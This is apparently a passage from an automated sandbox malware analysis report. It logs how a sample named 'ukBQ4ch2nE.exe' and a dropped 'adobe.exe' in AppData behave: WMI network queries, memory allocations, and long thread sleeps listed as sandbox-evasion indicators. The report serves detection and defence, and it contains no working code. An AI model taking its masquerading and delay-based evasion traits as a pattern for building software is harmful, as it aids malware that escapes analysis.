                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeMemory allocated: 3100000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeMemory allocated: 3390000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeMemory allocated: 3190000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeMemory allocated: B90000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeMemory allocated: 29B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeMemory allocated: 49B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 1440000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 3020000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 5020000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 13A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 2EA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 4EA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: FC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 2960000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 4960000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 2980000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 2BE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 2B20000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 599766Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 599657Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 599532Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 599407Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 599297Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 599188Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 599063Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 598938Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 598828Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 598718Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 598594Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 598485Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 598360Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 598235Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 598110Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 597985Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 597860Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 597735Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 597610Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 597485Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 597374Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 597265Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 597141Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 597032Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 596907Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 596771Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 596478Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 596326Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 596204Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 596079Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 595969Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 595829Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 595704Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 595579Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 595454Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 595344Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 595204Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 595079Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 594969Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 594860Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 594750Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 594640Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 594531Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 594422Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 594305Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 594171Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 594044Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 593927Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 593688Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599891Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599766Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599547Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599437Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599328Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599218Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599109Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598999Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598891Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598781Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598671Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598562Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598453Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598344Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598234Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598125Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598016Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597906Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597797Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597687Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597578Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597469Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597359Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597250Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597140Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597031Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596922Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596812Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596703Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596594Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596484Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596375Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596265Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596156Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596047Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595895Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595766Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595535Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595418Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595297Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595187Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595078Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594968Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594859Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594750Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594640Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594531Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594385Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594271Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599891Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599781Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599672Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599562Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599453Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599344Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599219Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599109Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598890Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598781Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598672Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598562Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598453Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598344Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598219Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598109Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597891Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597779Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597671Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597562Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597453Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597344Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597234Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597123Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597016Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596891Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596766Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596656Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596547Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596437Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596328Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596219Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596109Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595890Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595781Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595672Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595562Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595453Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595344Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595234Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595125Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595015Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594906Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594797Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594686Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594578Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeWindow / User API: threadDelayed 7042Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeWindow / User API: threadDelayed 2783Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWindow / User API: threadDelayed 7081Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWindow / User API: threadDelayed 2758Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWindow / User API: threadDelayed 1231Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWindow / User API: threadDelayed 8615Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180Thread sleep count: 36 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180Thread sleep time: -33204139332677172s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180Thread sleep time: -599875s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 2812Thread sleep count: 7042 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 2812Thread sleep count: 2783 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180Thread sleep time: -599766s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180Thread sleep time: -599657s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180Thread sleep time: -599532s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180Thread sleep time: -599407s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180Thread sleep time: -599297s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180Thread sleep time: -599188s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180Thread sleep time: -599063s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180Thread sleep time: -598938s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180Thread sleep time: -598828s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180Thread sleep time: -598718s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180Thread sleep time: -598594s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180Thread sleep time: -598485s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180Thread sleep time: -598360s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180Thread sleep time: -598235s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180Thread sleep time: -598110s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180Thread sleep time: -597985s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180Thread sleep time: -597860s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180Thread sleep time: -597735s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180Thread sleep time: -597610s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180Thread sleep time: -597485s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180Thread sleep time: -597374s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180Thread sleep time: -597265s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180Thread sleep time: -597141s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180Thread sleep time: -597032s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180Thread sleep time: -596907s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180Thread sleep time: -596771s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180Thread sleep time: -596478s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180Thread sleep time: -596326s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180Thread sleep time: -596204s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180Thread sleep time: -596079s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180Thread sleep time: -595969s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180Thread sleep time: -595829s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180Thread sleep time: -595704s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180Thread sleep time: -595579s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180Thread sleep time: -595454s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180Thread sleep time: -595344s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180Thread sleep time: -595204s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180Thread sleep time: -595079s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180Thread sleep time: -594969s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180Thread sleep time: -594860s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180Thread sleep time: -594750s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180Thread sleep time: -594640s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180Thread sleep time: -594531s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180Thread sleep time: -594422s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180Thread sleep time: -594305s >= -30000sJump to behavior
